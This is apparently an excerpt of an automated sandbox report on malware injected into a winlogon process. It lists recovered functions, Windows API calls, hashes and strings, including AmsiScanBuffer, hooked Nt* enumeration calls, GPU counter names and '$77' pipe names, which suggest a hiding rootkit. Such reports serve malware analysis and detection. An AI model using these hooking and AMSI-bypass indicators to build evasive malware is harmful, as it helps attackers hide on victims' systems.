                                                                                                                                    • Part of subcall function 000002E9917521BC: GetModuleHandleA.KERNEL32(?,?,?,000002E991751E75), ref: 000002E9917521D4
                                                                                                                                    • Part of subcall function 000002E9917521BC: GetProcAddress.KERNEL32(?,?,?,000002E991751E75), ref: 000002E9917521E5
                                                                                                                                    • Part of subcall function 000002E991756030: GetCurrentThreadId.KERNEL32 ref: 000002E99175606B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                                                                                  • API String ID: 4175298099-4225371247
                                                                                                                                  • Opcode ID: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction ID: f25b5edf6e60a0457debf3e42918aa10f4baba1afb095c8d07ecb395f2ac7e99
                                                                                                                                  • Opcode Fuzzy Hash: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction Fuzzy Hash: D1419165280ACBE1FA00EFABE849BD53361B741384FC2101F951942177EF7986CACBB1
                                                                                                                                  Function 000002E9917512B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 2005889112-2564639436
                                                                                                                                  • Opcode ID: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction ID: a21735339a83803276167e153e51cbe862e2234e7c2802a6256c20460b92f265
                                                                                                                                  • Opcode Fuzzy Hash: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction Fuzzy Hash: D0515772250BC586EB14CF66E84C35AB7A1F788FD9F45412ADA4A47719DF38C089CB11
                                                                                                                                  Function 000002E991753178 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                                                                                  • API String ID: 1943346504-1805530042
                                                                                                                                  • Opcode ID: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction ID: 26c4faaa4f3ce01e82b28a09432c89a9dc3644eafea14ce8a27424f04b1c5be6
                                                                                                                                  • Opcode Fuzzy Hash: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction Fuzzy Hash: DA31B422744ED297E710DF57E80C759A3A0F788BC4F46412AAE4D87A36DF38C595CB20
                                                                                                                                  Function 000002E991753288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                                                                                  • API String ID: 1943346504-3507739905
                                                                                                                                  • Opcode ID: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction ID: 2fe1cf3d04e074c441edd5dde03c5288aa455e060e5a0f5a48144b0a6b3f2ebe
                                                                                                                                  • Opcode Fuzzy Hash: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction Fuzzy Hash: 3C318D22B50B8286E714DF23E88C75967A0B785FC4F46412A9E4A83736DF38C4958B20
                                                                                                                                  Function 000002E9917293EC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction ID: 99738dc6357cb142af592c2e85b7234606a2382aa0657ef06e5351e5cfa35674
                                                                                                                                  • Opcode Fuzzy Hash: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction Fuzzy Hash: D2D1A032645BD28AEB60DF66D4483AD37A0F749788F19091BEE8957B97CB34C0D2CB10
                                                                                                                                  Function 000002E991759FEC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction ID: 7f5f0e6e2f7c5f7e2bbc1121a54cb1d16b76c198a6e1fef34f263735e65b24fa
                                                                                                                                  • Opcode Fuzzy Hash: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction Fuzzy Hash: 6AD1AF326447C68AEB60DF66D4483AD7BA0F745798F12412BEE8957B97DB38C4C1CB10
                                                                                                                                  Function 000002E99175104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction ID: b7e04b60139c7d9e1316f27439313651d5628575c8092bab553becf2a616c01f
                                                                                                                                  • Opcode Fuzzy Hash: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction Fuzzy Hash: F2417F73214BC1C6E760CF62E44839E77A1F388BD9F45812ADA8A47B58DF38C489CB50
                                                                                                                                  Function 000002E99175242C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                                                                                  • String ID: \\.\pipe\$77childproc
                                                                                                                                  • API String ID: 166002920-421986751
                                                                                                                                  • Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction ID: 10c4e4dba2aab4db695b4f74eb9ce6d446c2c32995884b7c1c0fae9a5a836e03
                                                                                                                                  • Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction Fuzzy Hash: 93115B32658B8183F710CB22F51C35A77A0F789BE4F54421AEA9942BA9CF3CC188CF51
                                                                                                                                  Function 000002E991726E10 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction ID: 4dd976a96d43247806e85808ac1010a0056d0ca12bf8b4a20d912f5fd0c13860
                                                                                                                                  • Opcode Fuzzy Hash: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction Fuzzy Hash: 388104216822C356FB659B27E94935922D1BB96780F974C1FAE0447397DB38C9C78F30
                                                                                                                                  Function 000002E991757A10 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction ID: 909f26f8926b652a5c15e8097695c496ecfcc18c9513092cf61358467725ba22
                                                                                                                                  • Opcode Fuzzy Hash: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction Fuzzy Hash: 9181E321A807C396FB509B67D84D3A966D5BB45BC4F97441F9A08837A3DB38C9C68F30
                                                                                                                                  Function 000002E99175986C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E9917598F1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E9917598FF
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E991759929
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E991759997
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E9917599A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                  • String ID: api-ms-
                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                  • Opcode ID: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction ID: 9f320c6c9fff93789a1df6739fe6a4e416d32357ddd2b4e66e4cac8dea9e2173
                                                                                                                                  • Opcode Fuzzy Hash: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction Fuzzy Hash: 5131A3313927C391EE159B17D8087A523A4BB85BA0F5B062EED1D87796EF38C4C4CB20
                                                                                                                                  Function 000002E9917631C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                  • String ID: CONOUT$
                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                  • Opcode ID: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction ID: d59b2a43610fecd3e97e0f158529c9dcbd61d0c63d723f229aba9aba4167f800
                                                                                                                                  • Opcode Fuzzy Hash: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction Fuzzy Hash: 5E11BF31354A8187E7508B57F85C71963A4F789FE4F06022AEA1EC7B95CF38C984CB61
                                                                                                                                  Function 000002E991753398 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID: $77
                                                                                                                                  • API String ID: 756756679-3904844309
                                                                                                                                  • Opcode ID: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction ID: fa77e6a11ed273225c10749b094a6a13fcf0baf6d162c6ec7fbad8676a10dd66
                                                                                                                                  • Opcode Fuzzy Hash: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction Fuzzy Hash: 30318026741B9283EA16DF57E54C7396BA0FB44BC4F0A402A8F4947B66EF34C4E18B20
                                                                                                                                  Function 000002E99175C700 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 365477584-0
                                                                                                                                  • Opcode ID: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction ID: 982d7bcbfc738492daa2fd466bb9cf7589b4390809013e827cf05e14e7d54eaf
                                                                                                                                  • Opcode Fuzzy Hash: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction Fuzzy Hash: E91154203942C342FA546733E85D36E11957B84BD0F56492EA82A576C7DF38D4C19F60
                                                                                                                                  Function 000002E991751A30 Relevance: 9.0, APIs: 6, Instructions: 41stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4193868204-0
                                                                                                                                  • Opcode ID: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction ID: 331277714fecfb4dbc4a3e4e24242b13808196db2402417037d23c257f308212
                                                                                                                                  • Opcode Fuzzy Hash: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction Fuzzy Hash: 30014021755B8282EB14DB23E89C35963A1F748FC1F85803ADE4A83755DF7CC985CB50
                                                                                                                                  Function 000002E991753BE4 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 449555515-0
                                                                                                                                  • Opcode ID: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction ID: f664c89772f0cd96668febe287735ebff334aca35b5132c1c300e0bebc4fc7b2
                                                                                                                                  • Opcode Fuzzy Hash: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction Fuzzy Hash: C7014C25341B8282FB249B23E84C71963A4BB48BC5F05002ECE4E463A6EF3DC498CB61
